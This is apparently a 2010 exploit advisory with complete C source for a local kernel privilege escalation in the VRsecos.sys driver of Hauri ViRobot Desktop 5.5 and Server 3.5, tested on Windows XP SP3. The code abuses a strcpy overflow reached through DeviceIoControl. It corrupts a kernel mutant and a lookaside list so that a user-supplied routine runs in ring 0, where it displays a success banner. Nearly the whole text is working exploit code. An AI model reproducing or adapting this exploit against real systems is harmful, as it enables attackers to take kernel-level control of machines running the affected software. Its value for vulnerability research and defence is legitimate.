Hauri ViRobot Desktop 5.5 & ViRobot Server 3.5 VRsecos.sys <=2008.8.1.1 Local Kernel Mode Privilege Escalation Vulnerability AUTHOR MJ0011 EMAIL th_decoder$126.com VULNERABLE PRODUCTS Hauri ViRobot Desktop 5.5 and below Hauri ViRobot Server 3.5 and below DETAILS: VRsecos.sys create a device called "VRsecos" , and handles DeviceIoControl Code = 0x8307202c , which use the function "strcpy" to copy memory from irp systembuffer to driver's data area , can be overwrite critical kernel object memory in vrsecos.sys ' s data area EXPLOIT CODE: (Test On Windows XP SP3 , only for vrsecos.sys == 2008.8.1.1) \ // virobot0day.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "windows.h" #include "malloc.h" typedef struct X_DISPATCHER_HEADER{ UCHAR Type ; UCHAR Absolute ; UCHAR Size ; UCHAR Inserted ; ULONG SignalState ; LIST_ENTRY WaitListHead ; }X_DISPATCHER_HEADER , *PX_DISPATCHER_HEADER; typedef struct X_KMUTANT{ X_DISPATCHER_HEADER Header ; LIST_ENTRY MutantListEntry ; PVOID OwnerThread ; UCHAR Abandoned ; UCHAR ApcDisable ; }X_KMUTANT , *PX_KMUTANT; PVOID GetInfoTable(ULONG ATableType) { ULONG mSize = 0x4000; PVOID mPtr = NULL; LONG status; HMODULE hlib = GetModuleHandle("ntdll.dll"); PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation"); do { mPtr = malloc(mSize); if (mPtr) { __asm { push 0 push mSize push mPtr push ATableType call pZwQuerySystemInformation mov status , eax } } else { return NULL; } if (status == 0xc0000004) { free(mPtr); mSize = mSize * 2; } } while (status == 0xc0000004); if (status == 0) { return mPtr; } free(mPtr); return NULL; } typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess; } SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG NumberOfHandles; SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ]; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; enum { SystemModuleInformation = 11, SystemHandleInformation = 16 }; typedef struct { ULONG Unknown1; ULONG Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID); typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID); typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)( ULONG x1, ULONG y1, ULONG x2, ULONG y2, ULONG color ); typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)( ULONG Color ); typedef VOID (*INBV_DISPLAY_STRING_FILTER)( PUCHAR *Str ); typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)( INBV_DISPLAY_STRING_FILTER DisplayStringFilter ); typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)( BOOLEAN bEnable ); typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)( ULONG x1, ULONG y1, ULONG x2, ULONG y2 ); typedef VOID (WINAPI *PINBV_DISPLAY_STRING)( PUCHAR Str ); PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ; PINBV_RESET_DISPLAY InbvResetDisplay = 0 ; PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ; PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ; PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ; PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ; PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ; PINBV_DISPLAY_STRING InbvDisplayString= 0 ; #define VGA_COLOR_BLACK 0 #define VGA_COLOR_RED 1 #define VGA_COLOR_GREEN 2 #define VGA_COLOR_GR 3 #define VGA_COLOR_BULE 4 #define VGA_COLOR_DARK_MEGAENTA 5 #define VGA_COLOR_TURQUOISE 6 #define VGA_COLOR_GRAY 7 #define VGA_COLOR_BRIGHT_GRAY 8 #define VGA_COLOR_BRIGHT_RED 9 #define VGA_COLOR_BRIGHT_GREEN 10 #define VGA_COLOR_BRIGHT_YELLOW 11 #define VGA_COLOR_BRIGHT_BULE 12 #define VGA_COLOR_BRIGHT_PURPLE 13 #define VGA_COLOR_BRIGHT_TURQUOISE 14 #define VGA_COLOR_WHITE 15 UCHAR DisplayString[] = " " " " " " " ---- ===== EXPLOIT SUCCESSFULLY ==== ---- " " " " " " ViRobot Desktop 5.5 & ViRobot Server 3.5 Local Privilege Escalation Exploit " " " " VULNERABLE PRODUCT " " " " ViRobot Desktop 5.5 and below " " ViRobot Server 3.5 and below " " " " VULERABLE FILE " " VRsecos.sys <= 2008.8.1.1 " " " " AUTHOR " " " " MJ0011 " " th_decoder$126.com " " " " 2010-8-22 " " " " " " "; VOID InbvShellCode() { //DISABLE INTERRUPT __asm { cli } //RESET TO VGA MODE InbvAcquireDisplayOwnership(); InbvResetDisplay(); //FILL FULL SCREEN InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK); //SET TEXT COLOR InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN); InbvInstallDisplayStringFilter(NULL); InbvEnableDisplayString(TRUE); InbvSetScrollRegion( 0 , 0 , 639 ,477); InbvDisplayString(DisplayString); while(TRUE) { }; } BOOL InbvInit(PVOID ntosbase , PSTR ntosname) { HMODULE hlib = LoadLibrary(ntosname); if (hlib == NULL) { return FALSE ; } InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase); InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase); InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase); InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase); InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase); InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase); InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase); InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase); if (InbvAcquireDisplayOwnership && InbvResetDisplay && InbvSolidColorFill && InbvSetTextColor && InbvInstallDisplayStringFilter && InbvEnableDisplayString && InbvSetScrollRegion && InbvDisplayString) { return TRUE ; } return FALSE ; } int main(int argc, char* argv[]) { printf("ViRotbot Desktop 5.5 & ViRobot Server 3.5 vrsecos.sys <= 2008.8.1.1\n" "Local Kernel Mode Privilege Escalation Vulnerability POC\n\n" "This Exploit Code Only for vrsecos == 2008.8.1.1\n" "Test On Windows XP SP3\n\n" "By MJ0011 th_decoder$126.com\n\n" "Press Enter\n"); getchar(); HANDLE hDev = CreateFile("\\\\.\\VRsecos" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 ); if (hDev == INVALID_HANDLE_VALUE) { printf("cannot open device....%u\n" , GetLastError()); //return 0; } //data for IoControlCode = 8307202C , buffer overrun PVOID pdata = malloc(0x2000); //fill non-zero data memset(pdata , 0x20 , 0x2000); //process mutx ... PX_KMUTANT pmutant = (PX_KMUTANT)((ULONG)pdata + 0x858 + 200); HANDLE hthread = OpenThread(THREAD_ALL_ACCESS , FALSE , GetCurrentThreadId()); PSYSTEM_HANDLE_INFORMATION phi = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(SystemHandleInformation); PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation); //get base address of vrsecos.sys PVOID vrsecosbase = 0 ; ULONG i ; for (i = 0 ; i < pmi->Count ; i ++) { if (stricmp((PCHAR)(pmi->Module[i].ImageName + strlen(pmi->Module[i].ImageName ) - strlen("vrsecos.sys")) , "vrsecos.sys") == 0 ) { vrsecosbase = pmi->Module[i].Base; break ; } } if (vrsecosbase == 0 ) { printf("cannot find vrsecos....\n"); //return 0 ; } if (!InbvInit(pmi->Module[0].Base , strrchr(pmi->Module[0].ImageName , '\\')+1)) { printf("cannot init inbv system\n"); return 0 ; } //get thread object PVOID MyThreadOBJ = NULL ; for (i = 0 ; i < phi->NumberOfHandles ; i ++) { if (phi->Information[i].HandleValue == (USHORT)hthread && phi->Information[i].UniqueProcessId == (USHORT)GetCurrentProcessId()) { MyThreadOBJ = phi->Information[i].Object; break ; } } if (MyThreadOBJ == NULL) { printf("cannot find my thread object\n"); return 0 ; } //for KeWaitForSignleObject //KeWaitForSignleObject will check SignalState pmutant->Header.SignalState = 0x30303030; pmutant->MutantListEntry.Flink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0 ); pmutant->MutantListEntry.Blink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0) ; //for KeReleaseMutex , Mutant 's owner thread must be our thread when KeReleaseMutex pmutant->OwnerThread = MyThreadOBJ; //for IOCTL CODE 0x83072014 //spec NPAGED_LOOKASIDE_LIST List // // user address space PVOID pAlloc = VirtualAlloc((PVOID)0x0A0A0A0A , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE); if (pAlloc == NULL) { printf("cannot allocate spec addr %u\n! ", GetLastError()); return 0 ; } *(DWORD*)0x0a0a0101 = 0 ; // vrsecos+2d68 < vrsecos+2d64 // and vrsecos+2d68 < 0 *(DWORD*)((ULONG)pdata + 0x81c +200) = 0xc1c1c1c1 ; *(DWORD*)((ULONG)pdata + 0x820 + 200) = 0xc0c0c0c0 ; //fill NPAGED_LOOKASIDE_LIST *(DWORD*)((ULONG)pdata + 0xdd8 + 200) = 0x0a0a0101; *(DWORD*)((ULONG)pdata + 0xddc +200 ) = 0x01010101 ; //fill NPAGE_LOOKASIDE_LIST->AllocateRoutine //is our R0 Shell Code !!! *(DWORD*)((ULONG)pdata + 0xdd8 + 0x28 +200 ) = (DWORD)InbvShellCode; ULONG btr ; ULONG temp; //memory overflow!! if (!DeviceIoControl(hDev , 0x8307202c , pdata , 0x1000 , NULL , 0 , &btr , NULL )) { printf("dev ctl 1 failed %u\n", GetLastError()); return 0 ; } PVOID pdata2 = malloc(0x6d4); *(DWORD*)pdata2 = 1; *(ULONG*)((ULONG)pdata2 + 8 ) = 0 ; strcpy((PCHAR)((ULONG)pdata2 + 264) , "exploit you !"); strcpy((PCHAR)((ULONG)pdata2 + 464) , "exploit you !!"); //first time , NPAGED_LOOKASIDE_LIST got ZERO !! if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 )) { printf("dev ctrl 2 failed %u\n", GetLastError()); return 0 ; } //second time , go NPAGED_LOOKASIDE_LIST->AllocateRoutine!! if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 )) { printf("dev ctrl 2 failed %u\n", GetLastError()); return 0 ; } return 0 ; }